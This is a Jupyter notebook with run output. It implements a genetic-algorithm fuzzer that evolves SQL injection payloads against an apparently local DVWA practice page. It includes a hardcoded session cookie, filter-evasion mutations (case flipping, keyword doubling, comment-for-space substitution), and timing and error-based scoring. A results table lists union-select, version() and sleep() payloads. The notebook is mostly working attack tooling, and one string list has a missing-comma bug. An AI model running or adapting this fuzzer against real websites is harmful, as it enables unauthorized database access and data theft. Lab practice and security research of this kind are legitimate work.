In [13]:
import pandas as pd
import numpy as np
import httpx
import time
import textdistance
import random
import pwn

In [14]:
MAX_POP = 10
MAX_FETCH_CHROMOSOME = 5
MAX_GENERATION = 3 ## 0 : ulti
MAX_SCORE = 0.5
TIMEOUT_SLEEP = 5

APPROX_ALPHA = 0.5
APPROX_BETA = 0
APPROX_GAMMA = 0.2
APPROX_DELTA = 0.3

In [15]:
URL = "http://localhost/vulnerabilities/sqli/?id={PAYLOAD}&Submit=Submit#"
COOKIES = {
    'PHPSESSID' : 'm2antojk6adprf1t8q22g17221',
    'security' : 'low'
}

In [16]:
KNOWN_RESPONSE_ERROR = [
    'error in your SQL syntax'
]

KNOWN_RESPONSE_TEXT = [
    '-MariaDB'
    '31333337'
]

In [17]:
def mutation(query, options):
    result = []
    if options == 'change_case_types':
        for pl in query.split():
            temp = ''
            for i, p in enumerate(list(pl)):
                if p.isalpha():
                    if random.randint(13, 37) % 2:
                        p = chr(ord(p) - 32) if ord('a') <= ord(p) <= ord('z') else chr(ord(p) + 32)

                temp += p
            result.append(temp)

        result = ' '.join(result)
    elif options == 'repeat_query':
        for_replace = []
        for pl in query.split():
            for p in pl.replace(',', ' ').split():
                if p not in for_replace:
                    for_replace.append(''.join(list(filter(str.isalpha, p))))

        result = query
        for fr in for_replace:
            prev = int(len(fr)/2) if len(fr) % 2 else int(len(fr)/2)+1
            result = result.replace(fr, fr[:prev] + fr + fr[prev:])
    elif options == 'replace_whitespace':
        result = query.replace(' ', '/**/')
    
    return result

In [18]:
## load public payload
datas = pd.read_csv('etc/payload.csv')

In [19]:
## remove nan values
for attr in datas:
    datas[attr] = datas[attr].fillna('')

In [20]:
## setup timeout when sleep function triggered
datas['fu_3'] = datas['fu_3'].str.replace('TIMEOUT_SLEEP', TIMEOUT_SLEEP.__str__())

In [21]:
NORMAL_RESPONSE = httpx.get(URL.replace('{PAYLOAD}', '999'), cookies=COOKIES).text

In [22]:
timeout = time.perf_counter()
httpx.get(URL.replace('{PAYLOAD}', '1'), cookies=COOKIES)
NORMAL_TIMEOUT = time.perf_counter() - timeout

In [23]:
## intial generation
GENERATION = [datas]

In [24]:
while len(GENERATION) < MAX_GENERATION if MAX_GENERATION else True:
    chrome = GENERATION[len(GENERATION)-1].copy(deep=True)

    score_error, score_reflected, score_blind, score_ld_response = [], [], [], []

    logger = pwn.log.progress('Logger')
    
    logger.status(f'Generation: {len(GENERATION)} --> Start')
    for i in range(len(chrome)):
        start_time = time.perf_counter()
        response_text = httpx.get(URL.replace('{PAYLOAD}', ' '.join(chrome.iloc[i].tolist())), cookies=COOKIES, timeout=8).text
        end_time = time.perf_counter() - start_time

        # logger.status(f'Generation: {len(GENERATION)} - Chromosome: {i} --> KRE')
        _kre = 0
        for kre in KNOWN_RESPONSE_ERROR:
            if kre in response_text:
                _kre = APPROX_ALPHA
                break

        score_error.append(_kre)

        # logger.status(f'Generation: {len(GENERATION)} - Chromosome: {i} --> KRT')
        _krt = 0
        for krt in KNOWN_RESPONSE_TEXT:
            if krt in response_text:
                _krt = APPROX_DELTA
                break
        
        score_reflected.append(_krt)

        # logger.status(f'Generation: {len(GENERATION)} - Chromosome: {i} --> Blind')
        if end_time >= TIMEOUT_SLEEP:
            score_blind.append( APPROX_GAMMA )
        else:
            score_blind.append( ((NORMAL_TIMEOUT - end_time) / float(NORMAL_TIMEOUT)) * APPROX_GAMMA )

        # logger.status(f'Generation: {len(GENERATION)} - Chromosome: {i} --> Levenshtein distance')
        if APPROX_BETA:
            score_ld_response.append( (textdistance.levenshtein.distance(NORMAL_RESPONSE, response_text) / float(len(NORMAL_RESPONSE))) * APPROX_BETA )
        else:
            score_ld_response.append( APPROX_BETA )

    chrome['score_error'] = score_error
    chrome['score_reflected'] = score_reflected
    chrome['score_blind'] = score_blind
    chrome['score_ld_response'] = score_ld_response
    chrome['score_total'] = [sum(chrome.iloc[i,-4:]) for i in range(len(chrome))]

    ## sort by higher score
    chrome = chrome.sort_values(by=['score_total'], ascending=False).reset_index(drop=True)

    GAP = MAX_POP - MAX_FETCH_CHROMOSOME
    GAP = GAP if not GAP % 2 else GAP + 1

    offspring = []
    while len(offspring) < GAP:
        initial_population = []
        for i in range(0, GAP, 2):
            TARGET_FU_CROSSOVER = random.choices(list(range(4)), [.2, .2, .5, .1]).pop()
            TARGET_MUTATION = random.choices(['change_case_types', 'repeat_query', 'replace_whitespace']).pop()
            
            prev = chrome.iloc[i,:4].tolist()
            next = chrome.iloc[i + 1,:4].tolist()
            
            prev[TARGET_FU_CROSSOVER], next[TARGET_FU_CROSSOVER] = mutation(next[TARGET_FU_CROSSOVER], TARGET_MUTATION), mutation(prev[TARGET_FU_CROSSOVER], TARGET_MUTATION)
            
            if '?'.join(prev) not in map(lambda x: '?'.join(x), initial_population):
                initial_population.append(prev)

            if '?'.join(next) not in map(lambda x: '?'.join(x), initial_population):
                initial_population.append(next)

        [offspring.append(pop) for pop in initial_population]
    
    candidate = pd.DataFrame(np.array(chrome.iloc[:MAX_POP - len(offspring), :4].values.tolist() + offspring), columns=chrome.columns.tolist()[:4])
    GENERATION.append(candidate)

    logger.status(f'Generation: {len(GENERATION)-1} --> Finished')

    logger.status(chrome.score_total.values.tolist().__str__())

    logger.status(f'Generation: {len(GENERATION)-1} --> Avg: {sum(chrome.score_total) / len(chrome)}, Max: {max(chrome.score_total)}, Min: {min(chrome.score_total)}')

    if sum(chrome.score_total) / len(chrome) > MAX_SCORE:
        logger.success(f'Generation: {len(GENERATION)-1} ({sum(chrome.score_total) / len(chrome)}) -- Stopped')
        break

[x] Logger
[x] Logger: Generation: 1 --> Start
[x] Logger: Generation: 1 --> Finished
[x] Logger: [0.08096307000624342, 0.07380735182445426, 0.07363788867643913, 0.07077341478318047, 0.06570182001957942, 0.06433723166852758, 0.06073887300848871, 0.05892534397261056, 0.0514532490121492, 0.04951467257590298, 0.049454540479896766, 0.04421416589263817, 0.0425864996650624, 0.03371701703297473, 0.03272757090788612, 0.017821646865110136, -0.01400804267312337]
[x] Logger: Generation: 1 --> Avg: 0.05037448904223651, Max: 0.08096307000624342, Min: -0.01400804267312337
[x] Logger
[x] Logger: Generation: 2 --> Start
[x] Logger: Generation: 2 --> Finished
[x] Logger: [0.07266825879613721, 0.05492861023246329, 0.053786783919145355, 0.027563728052061965, 0.02285702571120774, 0.019959752497374604, -0.024767586084953143, -0.03604713535547142, -0.06939311009619897, -0.08879185757173748]
[x] Logger: Generation: 2 --> Avg: 0.0032764470100029182, Max: 0.07266825879613721, Min: -0.08879185757173748


In [34]:
chrome

,fu_1,fu_2,fu_3,fu_4,score_error,score_reflected,score_blind,score_ld_response,score_total
0,',or 1>2,"union select null,31333337",-- -,0,0,0.072668,0,0.072668
1,"\""",,,#,0,0,0.054929,0,0.054929
2,',or 1>2,"union select null,31333337",-- -,0,0,0.053787,0,0.053787
3,',or 'a' = 'b',"union select null,null,null,null,version()",-- - - -,0,0,0.027564,0,0.027564
4,',and 1=1,"union select null,null,null,null,sleep(5)",-- - -,0,0,0.022857,0,0.022857
5,"\"")""",or 3=3,union/**/select/**/31333337,##,0,0,0.019960,0,0.019960
6,',and 1=1,"union select null,null,null,null,sleep(5)",-- - -,0,0,-0.024768,0,-0.024768
7,',or 'a' = 'b',,-- - - -,0,0,-0.036047,0,-0.036047
8,"\""",or 1=0,"union/**/select/**/null,null,null,31333337",-- -,0,0,-0.069393,0,-0.069393
9,"\""",,"union/**/select/**/null,null,null,null,version()",#,0,0,-0.088792,0,-0.088792
